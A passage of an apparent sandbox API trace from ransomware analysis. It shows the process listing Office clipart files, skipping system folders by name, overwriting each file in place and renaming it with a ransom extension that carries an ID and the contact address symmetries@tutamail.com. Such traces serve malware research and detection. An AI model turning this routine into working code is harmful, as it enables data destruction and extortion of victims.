hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebae9de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebae9de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebae9de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa69e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0198234.WMF", cAlternateFileName="")) returned 1 [0087.487] lstrcmpiW (lpString1="J0198234.WMF", lpString2=".") returned 1 [0087.487] lstrcmpiW (lpString1="J0198234.WMF", lpString2="..") returned 1 [0087.487] lstrcmpiW (lpString1="J0198234.WMF", lpString2="...") returned 1 [0087.487] lstrcmpiW (lpString1="J0198234.WMF", lpString2="windows") returned -1 [0087.487] lstrcmpiW (lpString1="J0198234.WMF", lpString2="recovery") returned -1 [0087.487] lstrcmpiW (lpString1="J0198234.WMF", lpString2="perflogs") returned -1 [0087.487] lstrcmpiW (lpString1="J0198234.WMF", lpString2="documents and settings") returned 1 [0087.487] lstrcmpiW (lpString1="J0198234.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.487] lstrcmpiW (lpString1="J0198234.WMF", lpString2="system volume information") returned -1 [0087.487] lstrcmpiW (lpString1="J0198234.WMF", lpString2="msocache") returned -1 [0087.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0087.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198234.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198234.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198234.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0087.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0087.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198234.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198234.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198234.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0087.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0087.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0087.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0087.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198234.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.488] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42654) returned 1 [0087.488] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa690) returned 0x24d210 [0087.489] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa690, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa690, lpOverlapped=0x0) returned 1 [0087.493] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.493] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa690, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa690, lpOverlapped=0x0) returned 1 [0087.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.494] CloseHandle (hObject=0x314) returned 1 [0087.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0087.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0087.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0087.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0087.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0087.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0087.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0087.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0087.495] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198234.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198234.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0087.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0087.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0087.496] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebae9de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebae9de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebae9de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6f9c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0198372.WMF", cAlternateFileName="")) returned 1 [0087.496] lstrcmpiW (lpString1="J0198372.WMF", lpString2=".") returned 1 [0087.496] lstrcmpiW (lpString1="J0198372.WMF", lpString2="..") returned 1 [0087.496] lstrcmpiW (lpString1="J0198372.WMF", lpString2="...") returned 1 [0087.496] lstrcmpiW (lpString1="J0198372.WMF", lpString2="windows") returned -1 [0087.496] lstrcmpiW (lpString1="J0198372.WMF", lpString2="recovery") returned -1 [0087.496] lstrcmpiW (lpString1="J0198372.WMF", lpString2="perflogs") returned -1 [0087.496] lstrcmpiW (lpString1="J0198372.WMF", lpString2="documents and settings") returned 1 [0087.496] lstrcmpiW (lpString1="J0198372.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.496] lstrcmpiW (lpString1="J0198372.WMF", lpString2="system volume information") returned -1 [0087.496] lstrcmpiW (lpString1="J0198372.WMF", lpString2="msocache") returned -1 [0087.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0087.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198372.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198372.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198372.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0087.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0087.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198372.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198372.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198372.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0087.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0087.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0087.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0087.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198372.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.497] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28572) returned 1 [0087.497] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6f90) returned 0x24d210 [0087.498] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6f90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6f90, lpOverlapped=0x0) returned 1 [0087.502] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.502] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6f90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6f90, lpOverlapped=0x0) returned 1 [0087.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.503] CloseHandle (hObject=0x314) returned 1 [0087.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0087.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0087.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0087.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0087.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0087.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0087.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0087.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0087.503] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198372.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198372.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198372.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0087.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0087.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0087.504] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebae9de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebae9de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebae9de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9d6c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0198377.WMF", cAlternateFileName="")) returned 1 [0087.504] lstrcmpiW (lpString1="J0198377.WMF", lpString2=".") returned 1 [0087.504] lstrcmpiW (lpString1="J0198377.WMF", lpString2="..") returned 1 [0087.504] lstrcmpiW (lpString1="J0198377.WMF", lpString2="...") returned 1 [0087.504] lstrcmpiW (lpString1="J0198377.WMF", lpString2="windows") returned -1 [0087.504] lstrcmpiW (lpString1="J0198377.WMF", lpString2="recovery") returned -1 [0087.504] lstrcmpiW (lpString1="J0198377.WMF", lpString2="perflogs") returned -1 [0087.504] lstrcmpiW (lpString1="J0198377.WMF", lpString2="documents and settings") returned 1 [0087.504] lstrcmpiW (lpString1="J0198377.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.504] lstrcmpiW (lpString1="J0198377.WMF", lpString2="system volume information") returned -1 [0087.504] lstrcmpiW (lpString1="J0198377.WMF", lpString2="msocache") returned -1 [0087.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0087.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198377.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198377.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198377.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0087.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0087.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198377.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198377.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198377.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0087.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0087.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0087.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0087.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198377.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.582] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=40300) returned 1 [0087.582] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9d60) returned 0x24d210 [0087.583] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9d60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9d60, lpOverlapped=0x0) returned 1 [0087.587] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.587] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9d60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9d60, lpOverlapped=0x0) returned 1 [0087.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.588] CloseHandle (hObject=0x314) returned 1 [0087.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0087.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0087.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0087.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0087.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0087.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0087.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0087.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0087.589] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198377.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198377.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198377.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0087.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0087.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0087.590] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebae9de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebae9de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebae9de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc20c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0198447.WMF", cAlternateFileName="")) returned 1 [0087.590] lstrcmpiW (lpString1="J0198447.WMF", lpString2=".") returned 1 [0087.590] lstrcmpiW (lpString1="J0198447.WMF", lpString2="..") returned 1 [0087.590] lstrcmpiW (lpString1="J0198447.WMF", lpString2="...") returned 1 [0087.590] lstrcmpiW (lpString1="J0198447.WMF", lpString2="windows") returned -1 [0087.590] lstrcmpiW (lpString1="J0198447.WMF", lpString2="recovery") returned -1 [0087.590] lstrcmpiW (lpString1="J0198447.WMF", lpString2="perflogs") returned -1 [0087.590] lstrcmpiW (lpString1="J0198447.WMF", lpString2="documents and settings") returned 1 [0087.590] lstrcmpiW (lpString1="J0198447.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.590] lstrcmpiW (lpString1="J0198447.WMF", lpString2="system volume information") returned -1 [0087.590] lstrcmpiW (lpString1="J0198447.WMF", lpString2="msocache") returned -1 [0087.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0087.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198447.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198447.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0198447.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0087.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0087.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0198447.WMF", cchWideChar=12, lpMultiByteStr=0x0, 